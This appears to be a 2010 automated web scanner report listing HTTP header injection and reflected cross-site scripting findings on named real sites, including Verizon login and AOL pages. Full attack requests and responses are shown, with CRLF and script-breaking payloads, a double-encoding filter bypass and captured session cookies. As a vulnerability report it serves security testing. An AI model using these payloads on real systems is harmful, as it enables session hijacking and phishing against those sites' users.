User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: amch.questionmarket.com
Proxy-Connection: Keep-Alive
Cookie: CS1=39341243-52-1; ES=818078-\BGjM-0

Response

HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:43:37 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Fri, 20-Nov-2009 03:43:36 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=39341243-52-1_725650-1-1; expires=Tue, 10-Jan-2012 19:43:37 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=818078-\BGjM-0_725650-1zSjM-0; expires=Tue, 10-Jan-2012 19:43:37 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=725650&site=5-48495972-&code=32c9e
01ddaa8666

Content-Length: 0
Content-Type: text/html


1.7. http://amch.questionmarket.com/adscgen/st.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload dc9f3%0d%0a23628b7f9c8 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=725650&site=dc9f3%0d%0a23628b7f9c8&code=39005743&randnum=4312221 HTTP/1.1
Accept: */*
Referer: http://www.yelp.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: amch.questionmarket.com
Proxy-Connection: Keep-Alive
Cookie: CS1=39341243-52-1; ES=818078-\BGjM-0

Response

HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:43:35 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Fri, 20-Nov-2009 03:43:34 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=39341243-52-1_725650-1-1; expires=Tue, 10-Jan-2012 19:43:35 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=818078-\BGjM-0_725650-~ySjM-0; expires=Tue, 10-Jan-2012 19:43:35 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=725650&site=-1-dc9f3
23628b7f9c8
-&code=39005743
Content-Length: 0
Content-Type: text/html


1.8. http://anrtx.tacoda.net/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://anrtx.tacoda.net
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 1b57e%0d%0a47dfc6b5cfd was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js HTTP/1.1
Host: anrtx.tacoda.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TID=16e8oqe01cg8de; Anxd=x; N=2:fd178a2029727e2044734a1f872c09cd,fd178a2029727e2044734a1f872c09cd1b57e%0d%0a47dfc6b5cfd; TData=99999|^|50085|54057|60490|#|50212|50220|60183|50216|50229|60185; Tsid=0^1290207076^1290208930|16728^1290207076^1290208930|18251^1290207125^1290208925; ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290811930|50216^1^1290811885|50229^1^1290811894|60185^1^1290811925;

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:45:29 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 20 Nov 2010 00:00:29 GMT
Set-Cookie: ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290811930|50216^1^1290811885|50229^1^1290811894|60185^1^1290811925; path=/; expires=Fri, 26-Nov-10 23:45:29 GMT; domain=.tacoda.net
Set-Cookie: Tsid=; path=/; expires=Thu, 19-Nov-09 23:45:29 GMT; domain=.tacoda.net
Set-Cookie: TData=99999|^|50085|54057|60490|#|50212|50220|60183|50216|50229|60185; expires=Mon, 14-Nov-11 23:45:29 GMT; path=/; domain=.tacoda.net
Set-Cookie: Anxd=x; expires=Sat, 20-Nov-10 05:45:29 GMT; path=/; domain=.tacoda.net
Set-Cookie: N=2:fd178a2029727e2044734a1f872c09cd1b57e
47dfc6b5cfd
,fd178a2029727e2044734a1f872c09cd; expires=Mon, 14-Nov-11 23:45:29 GMT; path=/; domain=.tacoda.net
Content-Length: 90
Keep-Alive: timeout=60, max=965
Connection: Keep-Alive
Content-Type: application/x-javascript

var ANUT=1;
var ANOO=0;
var ANSR=0;
var ANTID='16e8oqe01cg8de';
var ANSL;
ANRTXR();

1.9. http://anrtx.tacoda.net/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://anrtx.tacoda.net
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 2317e%0d%0a6638b1327e8 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=2317e%0d%0a6638b1327e8&pi=L&xs=1&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%2526ifu%253Dhttp%25253A//www.aolnews.com/&r=&v=5.2&cb=15132 HTTP/1.1
Accept: */*
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: anrtx.tacoda.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: TID=16e8oqe01cg8de; ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290809426; TData=99999|^|50085|54057|60490|#|50212|50220|60183; Anxd=x; N=2:2d4b241376080b3f4b97b4a5119bd63d,35e011dd6654f3998e5f304b452ffa3c

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:45:58 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 20 Nov 2010 00:00:58 GMT
Set-Cookie: ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290815158; path=/; expires=Fri, 26-Nov-10 23:45:58 GMT; domain=.tacoda.net
Set-Cookie: Tsid=0^1290210358^1290212158|2317e
6638b1327e8
^1290210358^1290212158; path=/; expires=Sat, 20-Nov-10 00:15:58 GMT; domain=.tacoda.net
Set-Cookie: TData=99999|^|50085|54057|60490|#|50212|50220|60183; expires=Mon, 14-Nov-11 23:45:58 GMT; path=/; domain=.tacoda.net
Set-Cookie: Anxd=x; expires=Sat, 20-Nov-10 05:45:58 GMT; path=/; domain=.tacoda.net
Set-Cookie: N=2:35e011dd6654f3998e5f304b452ffa3c,35e011dd6654f3998e5f304b452ffa3c; expires=Mon, 14-Nov-11 23:45:58 GMT; path=/; domain=.tacoda.net
Content-Length: 90
Content-Type: application/x-javascript

var ANUT=1;
var ANOO=0;
var ANSR=0;
var ANTID='16e8oqe01cg8de';
var ANSL;
ANRTXR();

1.10. https://auth.verizon.com/amserver/UI/Login [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into the Location response header. The payload 468b3%0d%0ae6a869cb573 was submitted in the goto parameter. This caused a response containing an injected HTTP header.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAW&clientId=myvz&goto=468b3%0d%0ae6a869cb573 HTTP/1.1
Host: auth.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 20 Nov 2010 02:15:45 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
X-dsameversion: 7 2005Q4 patch5 (Tue Feb 27 17:18:03 2007) SunOS
Am_client_type: genericHTML
Location: https://www22.verizon.com/myverizon/?session=n&goto=468b3
e6a869cb573

Set-cookie: JSESSIONID=551CF2532820EFDFFF319A43015D9990;Path=/
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcyLSw2AprZCxoQFFnJupN9A%2FsDZ3JgYIpY%3D%40AAJTSQACNjkAAlMxAAIwMw%3D%3D%23;Domain=.verizon.com;Path=/
Set-cookie: amlbcookie=03;Domain=.verizon.com;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/
Connection: close


1.11. https://auth.verizon.net/amserver/UI/Login [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auth.verizon.net
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into the Location response header. The payload 794ac%0d%0a4d3881665ea was submitted in the goto parameter. This caused a response containing an injected HTTP header.

Request

GET /amserver/UI/Login?realm=dotnet&module=AIAWN&goto=794ac%0d%0a4d3881665ea HTTP/1.1
Host: auth.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=webmail; JSESSIONID=2D7E445097FDA183EEB1FF24695BC505; amlbcookie=02; AMAuthCookie=LOGOUT; POPRefid=refid=&refresh=y&reftrytime=0&refnum=;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 20 Nov 2010 03:43:13 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
X-dsameversion: 7 2005Q4 patch 120954-05
Am_client_type: genericHTML
Location: https://www.verizon.net/ssowebapp/VOLPortalLogin794ac
4d3881665ea

Set-cookie: JSESSIONID=D27C25CA2B136908BF4CEE59B12E3BAC;Path=/
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcwJNpIDBK%2BVlDyOb6NjEFv7sWCn5SRgPkk%3D%40AAJTSQACMzAAAlMxAAIwMg%3D%3D%23;Domain=.verizon.net;Path=/
Set-cookie: amlbcookie=02;Domain=.verizon.net;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.net;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/
Connection: close


2. Cross-site scripting (reflected)  previous
There are 997 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://abc.go.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80597"%3balert(1)//8ad75bcf9ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80597";alert(1)//8ad75bcf9ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?80597"%3balert(1)//8ad75bcf9ec=1 HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 97885
Content-Type: text/html; charset=UTF-8
Last-Modified: Fri, 19 Nov 2010 23:38:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc06
X-Powered-By: ASP.NET
Set-Cookie: SWID=FE2AB8A7-AB90-4FDD-9541-F9BB3ED0890A; path=/; expires=Fri, 19-Nov-2030 23:38:22 GMT; domain=.go.com;
Cache-Expires: Fri, 19 Nov 2010 23:53:22 GMT
Date: Fri, 19 Nov 2010 23:38:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://developers.facebook.com/schem
...[SNIP]...
bc.csar.go.com/DynamicCSAd?srvc=abc&itype=ThinBanner&itype=Rectangles&itype=Background&itype=LRGutters&itype=PopUnder&itype=Survey&itype=FPBranding&itype=Banner-Unicast&itype=RevenueScience&url=/index?80597";alert(1)//8ad75bcf9ec=1"; var paramD = "&"; var regexS = "[\?&]test=([^&#]*)"; var regex = new RegExp( regexS ); var resultsT = regex.exec( window.location.href ); if(resultsT != null) csarUrl += paramD + "test="+ resul
...[SNIP]...

2.2. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9bfc"%3bc758afbe8ca was submitted in the REST URL parameter 1. This input was echoed as d9bfc";c758afbe8ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetworkd9bfc"%3bc758afbe8ca/aol_pp HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.592896; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:35 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10535
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ln31 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ln31.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworkd9bfc";c758afbe8ca";
s_265.prop2="aol_pp";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

2.3. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b6e0"%3b62d3162371a was submitted in the REST URL parameter 1. This input was echoed as 5b6e0";62d3162371a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork5b6e0"%3b62d3162371a/aolcom_terms HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.1124666368; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:38 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10547
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ln31 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ln31.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork5b6e0";62d3162371a";
s_265.prop2="aolcom_terms";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

2.4. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/copyright_infringement

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 866c5"%3bc2c3419ad15 was submitted in the REST URL parameter 1. This input was echoed as 866c5";c2c3419ad15 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork866c5"%3bc2c3419ad15/copyright_infringement HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.2198408192; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:40 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10567
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ln31 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ln31.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork866c5";c2c3419ad15";
s_265.prop2="copyright_infringement";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

2.5. http://about.aol.com/aolnetwork/trademarks [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/trademarks

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43ebc"%3b89a48e93d80 was submitted in the REST URL parameter 1. This input was echoed as 43ebc";89a48e93d80 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork43ebc"%3b89a48e93d80/trademarks HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.269028352; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:36 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10541
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ln31 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ln31.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork43ebc";89a48e93d80";
s_265.prop2="trademarks";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

2.6. https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://account.login.aol.com
Path:   /opr/_cqr/opr/opr.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83291%2522%253b5bb1d8c030d was submitted in the authLev parameter. This input was echoed as 83291";5bb1d8c030d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the authLev request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /opr/_cqr/opr/opr.psp?sitedomain=sns.webmail.aol.com&authLev=083291%2522%253b5bb1d8c030d&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Awebmail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AAOL%7Csnt%3AScreenName%7Csid%3Ab8f0c4b0-0c85-446d-b863-b15687c1024d&lang=en&locale=us&offerId=newmail-en-us-v2&seamless=novl HTTP/1.1
Host: account.login.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Fri, 19 Nov 2010 23:39:11 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2920
Connection: close



...[SNIP]...
fxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/opr/badbrowser.jsp";
s_265.prop15="bm9uZQ%3D%3D";
s_265.prop17="std";
s_265.prop18="083291";5bb1d8c030d";
s_265.prop19="wa3";
s_265.prop20="en-us";
s_265.prop21="AOLPortal";
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

2.7. http://ad.aggregateknowledge.com/iframe!t=317! [clk0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=317!

Issue detail

The value of the clk0 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5546"%3balert(1)//a772291970e was submitted in the clk0 parameter. This input was echoed as b5546";alert(1)//a772291970e in the application's response.

